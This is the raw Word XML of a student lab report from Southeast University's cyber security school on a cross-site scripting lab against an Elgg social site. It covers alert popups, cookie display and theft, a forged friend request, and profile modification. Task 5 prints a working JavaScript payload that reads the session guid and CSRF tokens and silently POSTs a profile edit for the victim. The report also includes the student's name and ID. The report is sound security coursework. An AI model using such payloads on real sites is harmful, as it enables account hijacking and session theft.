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2D6B" w14:textId="77777777" w:rsidR="00E82015" w:rsidRDefault="00E82015" w:rsidP="00E82015">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F460F94" w14:textId="77777777" w:rsidR="00E82015" w:rsidRDefault="00E82015" w:rsidP="00E82015">
      <w:pPr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1E27828A" wp14:editId="6CC79D7B">
            <wp:extent cx="1643115" cy="538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东南大学校标标准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9" cy="5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2F5" w14:textId="77777777" w:rsidR="00E82015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</w:p>
    <w:p w14:paraId="40D72B2C" w14:textId="77777777" w:rsidR="00E82015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</w:p>
    <w:p w14:paraId="19A00EBA" w14:textId="77777777" w:rsidR="00E82015" w:rsidRPr="00BC7074" w:rsidRDefault="00E82015" w:rsidP="00E82015">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C61C3F2" w14:textId="77777777" w:rsidR="00E82015" w:rsidRPr="00BC7074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  <w:r w:rsidRPr="00E82015">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:spacing w:val="240"/>
          <w:kern w:val="0"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:fitText w:val="5280" w:id="-1995684864"/>
        </w:rPr>
        <w:t>实验报</w:t>
      </w:r>
      <w:r w:rsidRPr="00E82015">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
          <w:fitText w:val="5280" w:id="-1995684864"/>
        </w:rPr>
        <w:t>告</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a3"/>
        <w:tblW w:w="26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00"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E82015" w14:paraId="40216E40" w14:textId="77777777" w:rsidTr="00D15BA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3DA6F49B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4902A20B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050F61A2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3A212AF7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257A1887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580BC1DE" w14:textId="77777777" w:rsidR="00E82015" w:rsidRPr="00B17A8A" w:rsidRDefault="00E82015" w:rsidP="00D15BA8">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="仿宋_GB2312"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B17A8A">
              <w:rPr>
                <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>姓名：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6193EC9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218A7665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57ECBE35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3049D5F7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1BA22EFD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37F1539D" w14:textId="77777777" w:rsidR="00E82015" w:rsidRPr="00B17A8A" w:rsidRDefault="00E82015" w:rsidP="00D15BA8">
            <w:pPr>
              <w:jc w:val="left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强珂阳</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E82015" w14:paraId="5EA8BDA1" w14:textId="77777777" w:rsidTr="00D15BA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="5D8F5A46" w14:textId="77777777" w:rsidR="00E82015" w:rsidRPr="00B17A8A" w:rsidRDefault="00E82015" w:rsidP="00D15BA8">
            <w:pPr>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:eastAsia="仿宋_GB2312"/>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B17A8A">
              <w:rPr>
                <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>学号：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F872524" w14:textId="77777777" w:rsidR="00E82015" w:rsidRPr="00B17A8A" w:rsidRDefault="00E82015" w:rsidP="00D15BA8">
            <w:pPr>
              <w:jc w:val="left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57118106</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0A7FA461" w14:textId="77777777" w:rsidR="00E82015" w:rsidRDefault="00E82015" w:rsidP="00E82015">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DD1DD60" w14:textId="77777777" w:rsidR="00E82015" w:rsidRDefault="00E82015" w:rsidP="00E82015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东南大学网络空间安全学院</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726984C" w14:textId="77777777" w:rsidR="00E82015" w:rsidRDefault="00E82015" w:rsidP="00E82015">
      <w:pPr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t>School of C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>yber</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="黑体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Science &amp; Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD6F13" w14:textId="77777777" w:rsidR="00E82015" w:rsidRDefault="00E82015" w:rsidP="00E82015">
      <w:pPr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t>Southeast University</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAEDAFB" w14:textId="742C303F" w:rsidR="001310F8" w:rsidRDefault="00E82015" w:rsidP="00E82015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</w:p>
    <w:p w14:paraId="61EC9F88" w14:textId="1C08E01C" w:rsidR="00871901" w:rsidRDefault="00A56584" w:rsidP="001040B5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TASK1</w:t>
      </w:r>
      <w:r w:rsidR="00F61BD6">
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="007452D3">
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Posting</w:t>
      </w:r>
      <w:r w:rsidR="007452D3">
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> a Malicious Message to Display an Alert Window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8A4234" w14:textId="6B33B267" w:rsidR="007452D3" w:rsidRDefault="00D86FCD" w:rsidP="007452D3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Alice的账号中修改Brief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description：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395001A5" w14:textId="3DC7959C" w:rsidR="00D86FCD" w:rsidRDefault="00D86FCD" w:rsidP="007452D3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7238CFB" wp14:editId="69E4448F">
            <wp:extent cx="4070559" cy="50167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7EA" w14:textId="7710118F" w:rsidR="000B5545" w:rsidRDefault="000B5545" w:rsidP="007452D3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发现Alice的Brief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description为空，说明代码生效：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E99F4" w14:textId="10E32B44" w:rsidR="000B5545" w:rsidRDefault="000B5545" w:rsidP="007452D3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5FF7F48" wp14:editId="65C2D41B">
            <wp:extent cx="3676839" cy="18542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2274" w14:textId="012F5229" w:rsidR="00D86FCD" w:rsidRDefault="00D86FCD" w:rsidP="007452D3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再登录Boby的账号查看Alice的主页：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6F9197" w14:textId="261E403C" w:rsidR="00D86FCD" w:rsidRDefault="00D86FCD" w:rsidP="007452D3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E42CFDB" wp14:editId="42DCA7CD">
            <wp:extent cx="5274310" cy="2364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12B0" w14:textId="1456FE00" w:rsidR="00D86FCD" w:rsidRDefault="00D86FCD" w:rsidP="007452D3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弹出警示框显示XSS。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685AF79A" w14:textId="77777777" w:rsidR="000B5545" w:rsidRPr="007452D3" w:rsidRDefault="000B5545" w:rsidP="007452D3">
      <w:pPr>
        <w:ind w:leftChars="67" w:left="141" w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C675920" w14:textId="5E14BAFA" w:rsidR="00871901" w:rsidRPr="00C050A7" w:rsidRDefault="00871901" w:rsidP="00871901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TASK2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00D86FCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Posting</w:t>
      </w:r>
      <w:r w:rsidR="00D86FCD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86FCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00D86FCD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86FCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Malicious</w:t>
      </w:r>
      <w:r w:rsidR="00D86FCD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86FCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Message</w:t>
      </w:r>
      <w:r w:rsidR="00D86FCD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86FCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00D86FCD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86FCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Display</w:t>
      </w:r>
      <w:r w:rsidR="00D86FCD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86FCD">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2635B1A9" w14:textId="35D9765B" w:rsidR="00F13A19" w:rsidRDefault="000B5545" w:rsidP="000E0C42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Alice的Brief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description：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E4B9C" w14:textId="78B0C99C" w:rsidR="000B5545" w:rsidRDefault="000B5545" w:rsidP="000E0C42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1334C1A" wp14:editId="17FB409D">
            <wp:extent cx="4051508" cy="609631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1D93" w14:textId="0D88FBDE" w:rsidR="00F13A19" w:rsidRDefault="000B5545" w:rsidP="000E0C42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保存后同样没有显示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B332A7F" w14:textId="43A81857" w:rsidR="000B5545" w:rsidRDefault="000B5545" w:rsidP="000E0C42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95660B3" wp14:editId="51C85C3D">
            <wp:extent cx="3746693" cy="1670136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A38A" w14:textId="640B65E9" w:rsidR="000B5545" w:rsidRDefault="000B5545" w:rsidP="000E0C42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oby访问Alice主页，弹出警示框：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24517B1B" w14:textId="3BBB3D6B" w:rsidR="000B5545" w:rsidRDefault="000B5545" w:rsidP="000E0C42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FB99A3E" wp14:editId="0E5F39E2">
            <wp:extent cx="5226319" cy="17209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10BC" w14:textId="6F10477C" w:rsidR="000B5545" w:rsidRDefault="000B5545" w:rsidP="000E0C42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得到cookie。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9359E1" w14:textId="77777777" w:rsidR="000B5545" w:rsidRDefault="000B5545" w:rsidP="000E0C42">
      <w:pPr>
        <w:ind w:leftChars="67" w:left="141" w:firstLine="1"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03DCA35F" w14:textId="1D59F88C" w:rsidR="00D732E5" w:rsidRPr="00D30DBF" w:rsidRDefault="000E0C42" w:rsidP="000E0C42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TASK3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="000B5545">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Stealing</w:t>
      </w:r>
      <w:r w:rsidR="000B5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0B5545">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Cookues</w:t>
      </w:r>
      <w:r w:rsidR="000B5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0B5545">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="000B5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0B5545">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="000B5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0B5545">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r w:rsidR="000B5545">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’s Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17651BBC" w14:textId="4D7C9289" w:rsidR="007F6B26" w:rsidRDefault="004676D0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Alice的Brief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description：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E683D" w14:textId="3BD51285" w:rsidR="004676D0" w:rsidRDefault="00EC76BA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8344B42" wp14:editId="0938261B">
            <wp:extent cx="3981655" cy="41277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6692" w14:textId="001F610B" w:rsidR="004676D0" w:rsidRDefault="00EC76BA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0183861" wp14:editId="1C37D202">
            <wp:extent cx="3670489" cy="1492327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8517" w14:textId="65194847" w:rsidR="00EC76BA" w:rsidRDefault="00EC76BA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打开终端，</w:t>
      </w:r>
      <w:r w:rsidR="009C2FE0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>监听5555端口，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Boby访问Alice主页</w:t>
      </w:r>
      <w:r w:rsidR="009C2FE0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，得到Boby的cookie：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B1F74" w14:textId="15F6BF7C" w:rsidR="00296973" w:rsidRDefault="009C2FE0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CCCB665" wp14:editId="5E92173A">
            <wp:extent cx="5274310" cy="16560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22CC" w14:textId="5E71B7F4" w:rsidR="00DB000D" w:rsidRPr="00D30DBF" w:rsidRDefault="00DB000D" w:rsidP="00DB000D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lastRenderedPageBreak/>
        <w:t>TASK4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312" w:hint="eastAsia"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="009C2FE0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Becoming</w:t>
      </w:r>
      <w:r w:rsidR="009C2FE0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9C2FE0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="009C2FE0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9C2FE0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Victim</w:t>
      </w:r>
      <w:r w:rsidR="009C2FE0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r w:rsidR="009C2FE0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Friend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5D5C18" w14:textId="4199A2D8" w:rsidR="00CD7A8F" w:rsidRDefault="009C2FE0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先用HTTP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eader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Live捕获</w:t>
      </w:r>
      <w:r w:rsidR="001A4374">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>合法添加Samy的请求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8D7E2F" w14:textId="6235E4D3" w:rsidR="001A4374" w:rsidRDefault="001A4374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D6E5D65" wp14:editId="5072E131">
            <wp:extent cx="5274310" cy="5518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4C31" w14:textId="0AA6FE8F" w:rsidR="001A4374" w:rsidRDefault="001A4374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编辑Amy的abou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me：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4380633B" w14:textId="28C00073" w:rsidR="001A4374" w:rsidRDefault="001104C2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B752B8E" wp14:editId="08E3DDC8">
            <wp:extent cx="5274310" cy="15087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F77E" w14:textId="5F5C661A" w:rsidR="001104C2" w:rsidRDefault="003E4793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Boby的账号登录并访问Samy的主页后，发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Boby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已经加了Samy为好友：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C5DE5D" w14:textId="78988C38" w:rsidR="003E4793" w:rsidRDefault="003E4793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8975A3B" wp14:editId="7D3269A7">
            <wp:extent cx="4159250" cy="134702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5914" cy="13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4964" w14:textId="0EA15EAC" w:rsidR="003E4793" w:rsidRDefault="003E4793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问题一：要通过JavaScrip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variables得到时间戳和安全令牌，否则HTTP请求会被当成无效请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571AB3F" w14:textId="08F13ED0" w:rsidR="001104C2" w:rsidRPr="003E4793" w:rsidRDefault="003E4793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问题二：可以。</w:t>
      </w:r>
      <w:r w:rsidR="005B53A2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>利用相关插件可以防止HTML编辑模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D0832E" w14:textId="22C987E0" w:rsidR="001A4374" w:rsidRDefault="001A4374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</w:p>
    <w:p w14:paraId="19FB96D3" w14:textId="32B85D99" w:rsidR="00852DD4" w:rsidRDefault="00852DD4" w:rsidP="00A15EB9">
      <w:pPr>
        <w:ind w:firstLine="1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TASK</w:t>
      </w:r>
      <w:r w:rsidR="007347E2"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：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Modifying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the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Victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s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Profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023C1AAB" w14:textId="4DA3FCCB" w:rsidR="00725D6A" w:rsidRPr="00725D6A" w:rsidRDefault="000A4452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先修改Boby的profile，用HTTP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eader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Live捕获合法修改请求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F1F72B" w14:textId="22CCA2E2" w:rsidR="00725D6A" w:rsidRPr="00725D6A" w:rsidRDefault="00453525" w:rsidP="00725D6A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A8F0155" wp14:editId="7B4FC852">
            <wp:extent cx="4671013" cy="2616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8925"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4734571" cy="265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670EA" w14:textId="56D7D422" w:rsidR="00453525" w:rsidRPr="00453525" w:rsidRDefault="00A8520A" w:rsidP="00A8520A">
      <w:pPr>
        <w:widowControl/>
        <w:ind w:leftChars="67" w:left="141"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A8520A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>修改Samy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的about</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>me：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C2409" w14:textId="7E20F120" w:rsidR="00453525" w:rsidRDefault="00A8520A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0EACAB7" wp14:editId="6ABDE522">
            <wp:extent cx="5274310" cy="22593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6258" w14:textId="6CB6F9FC" w:rsidR="00A15EB9" w:rsidRDefault="00A15EB9" w:rsidP="001040B5">
      <w:pPr>
        <w:ind w:leftChars="67" w:left="141" w:firstLine="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代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282398FB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&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B0A02F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window.onload = function(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFE2476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//JavaScript code to access user name, user guid, Time Stamp __elgg_ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C9803B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//and Security Token __elgg_token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37494E92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//var userName=elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125809B0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guid="&amp;guid="+elgg.session.user.guid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567865D3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ts="&amp;__elgg_ts="+elgg.security.token.__elgg_ts;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E73507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token="&amp;__elgg_token="+elgg.security.token.__elgg_token;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA4488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name="&amp;name="+elgg.session.user.name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3153D9F8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desc="&amp;description=Samy is my hero!"+"&amp;accesslevel[description]=2";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DDBA49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//Construct the content of your url.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D406F63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sendurl="http://www.xsslabelgg.com/action/profile/edit";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFE2652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content=token+ts+name+desc+guid; //FILL IN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010ED48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samyGuid="47"; //FILL IN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646BC6A9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 xml:space="preserve">if(elgg.session.user.guid!=samyGuid) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B123A1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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B08FFC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//Create and send Ajax request to modify profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B908EBC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var Ajax=null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C0BA7B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Ajax=new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BEE803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Ajax.open("POST",sendurl,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD78112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//Ajax.setRequestHeader("Host","www.xsslabelgg.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7F8267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Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BA94CA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Ajax.send(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EAEE76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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CAFFFC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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595A5CC" w14:textId="42A11FF3" w:rsid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  <w:r w:rsidRPr="00A15EB9">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
